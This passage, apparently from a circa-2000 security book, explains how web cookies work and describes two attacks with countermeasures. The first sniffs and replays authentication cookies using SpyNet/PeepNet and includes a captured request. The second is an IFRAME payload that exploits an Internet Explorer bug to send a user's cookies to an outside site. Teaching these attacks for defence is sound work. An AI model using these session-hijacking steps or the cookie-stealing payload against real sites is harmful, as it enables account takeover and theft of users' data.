Ever wonder how some web sites personalize your visits, like remembering the contents of a shopping cart or maybe a preferred shipping method automatically filled into a form? The protocol that underlies the World Wide Web, HTTP, does not have a facility for tracking things from one visit to another, so an extension was rigged up to allow it to maintain such “state” across HTTP requests and responses. The mechanism, described in RFC 2109, setscookies,or special tokens contained within HTTP requests and responses that allow web sites to remember who you are from visit to visit. Cookies can be setper session,in which case they remain in volatile memory and expire when the browser is closed, or according to a set expiration time. Or they can bepersistent,residing as a text file on the user’s hard drive, usually in a folder called “Cookies” (this is typically
%windir%\Cookies under Win9x,or %userprofile%\Cookies under NT/2000). As you might imagine, attackers who can lay their hands on your cookies might be able to spoof your online identity or glean sensitive information cached within cookies. Read on to see how easy it can be.
] Cookie Snarfing
Popularity: 7 Simplicity: 5
Impact: 2
Risk Rating: 5
The brute force way to hijack cookies is to sniff them off the network and then replay them to the server. Any ol’ packet capture tool can perform this duty, but one of the better ones for cookie snarfing is SpyNet/PeepNet by Laurentiu Nicula (search the archives at http://packetstorm.securify.com to find this gem). SpyNet is two tools that act in con- cert: the CaptureNet program performs the actual packet capture and saves them to disk, and the PeepNet tool opens the capture file to reconstruct the sessions in human-legible form. PeepNet can actually replay a web-browsing session just as if you were the user be- ing monitored. The following example is a snippet from a PeepNet reconstruction of a
session that uses cookie authentication to control access to personalized page views (names have been changed to protect the innocent):
GET http://www.victim.net/images/logo.gif HTTP/1.0 Accept: */*
Referrer: http://www.victim.net/
Host: www.victim.net
Cookie: jrunsessionid=96114024278141622; cuid=T0RPMlZXTFRLR1pWTVFISEblahblah
You can plainly see the cookie token supplied in this HTTP request sent to the server.
The relevant portion is “cuid=“, which denotes a unique identifier used to authenticate this user of the site www.victim.net. Let’s say the attackers now visit victim.net, create their own login ID, and receive their own cookie. It just so happens that victim.net sets persistent cookies that are written to files on disk (as opposed to per-session cookies stored in volatile memory). Attackers can open their own cookie and replace the “cuid=“
entry with the one they sniffed. Upon logging back in to victim.net, the attackers are now masquerading as the original customer.
PeepNet’s ability to replay an entire session or to select portions of it makes this type of attack much easier. By use of the Go Get It! button, the actual pages viewed by a user can be retrieved, using the same cookie snarfed earlier by CaptureNet. Figure 16-4 illus- trates PeepNet displaying someone’s completed orders using their authentication cookie sniffed by CaptureNet (see the lower-right frame following the “Cookie:” nota- tion—these are the session and authentication cookies, respectively).
This is a pretty nifty trick. CaptureNet can also present a full decode of recorded traf- fic that’s nearly equivalent to the output of professional-level protocol analysis tools like Network Associates, Inc.’s SnifferPro. Even better, SpyNet is free!
U Countermeasures: Cookie Cutters
Be wary of sites that use cookies for authentication and storage of sensitive personal data.
One tool to help in this regard is Cookie Pal from Kookaburra Software at http://
www.kburra.com/cpal.html. It can be set to warn you when web sites attempt to set cookies, enabling you to see what’s going on behind the scenes so you can decide whether you want to allow such activity. Microsoft’s Internet Explorer has a built-in cookie screening feature, available under the Internet Options control panel, Security tab, Internet Zone, Custom Level, “Prompt” for persistent and per-session cookies. Netscape browser cookie behavior is set via Edit | Preferences | Advanced, and checking either Warn Me Before Accepting A Cookie or Disable Cookies (see Figure 16-3). For those cook- ies that you do accept, check them out if they are written to disk, and see if the site is stor- ing any personal information about you.
Also remember, if you visit a site that uses cookies for authentication, they should at least use SSL to encrypt the initial post of your username and password so that it doesn’t just show up as plaintext in PeepNet.
We’d prefer to disable cookies outright, but many of the sites we frequent often require them to be enabled. For example, Microsoft’s wildly popular Hotmail service
requires cookies to be enabled in order to log in, and because Hotmail rotates between various authentication servers, it isn’t easy just to add Hotmail to the Trusted Sites zone under Internet Options (as we describe in the preceding section on security zones). You could use the *.hotmail.com notation to help out here. Cookies are an imperfect solution to inadequacies in HTTP, but the alternatives are probably much worse (for example, ap- pending an identifier to URLs that may be stored on proxies). Until someone comes up with a better idea, monitoring cookies using the tools referenced earlier is the only solution.
Figure 16-4. A cookie recorded by CaptureNet and played back in PeepNet
] Cookie Stealing via Malicious URL
Popularity: 5 Simplicity: 8
Impact: 2
Risk Rating: 5
Here’s a scary thought: IE users clicking a purposely crafted URL are potentially vul- nerable to having their cookies revealed. Bennett Haselton and Jamie McCarthy of Peacefire have posted a script at http://www.peacefire.org/security/iecookies that makes this thought a reality: it extracts cookies from the client machine simply by clicking a link within this page. The contents of cookies residing on the user’s machine are read- able by this script and thus are accessible to web site operators.
This can also be used to nasty effect when sent within inline frame (IFRAME) tags em- bedded in HTML on a web page (or in HTML-formatted email messages or newsgroup posts). The following example suggested by Internet security consultant Richard M.
Smith points out how IFRAME could be used in conjunction with the Peacefire exploit to steal cookies:
<iframe src="http://www.peacefire.org%2fsecurity%2fiecookies%2f showcookie.html%3f.yahoo.com/"></iframe>
A malicious email message that included many such embedded links could grab cookies on the user’s hard drive and return them to the peacefire.org site operators. For- tunately, the Peacefire gang seem like nice folk; but do you really want them to have all that potentially revealing data?
U Closing the Open Cookie Jar
Obtain and apply the patch referenced at http://www.microsoft.com/technet/security/
bulletin/ms00-033.asp. Alternatively, cookies can be monitored using Cookie Pal or IE’s built-in functionality as described earlier.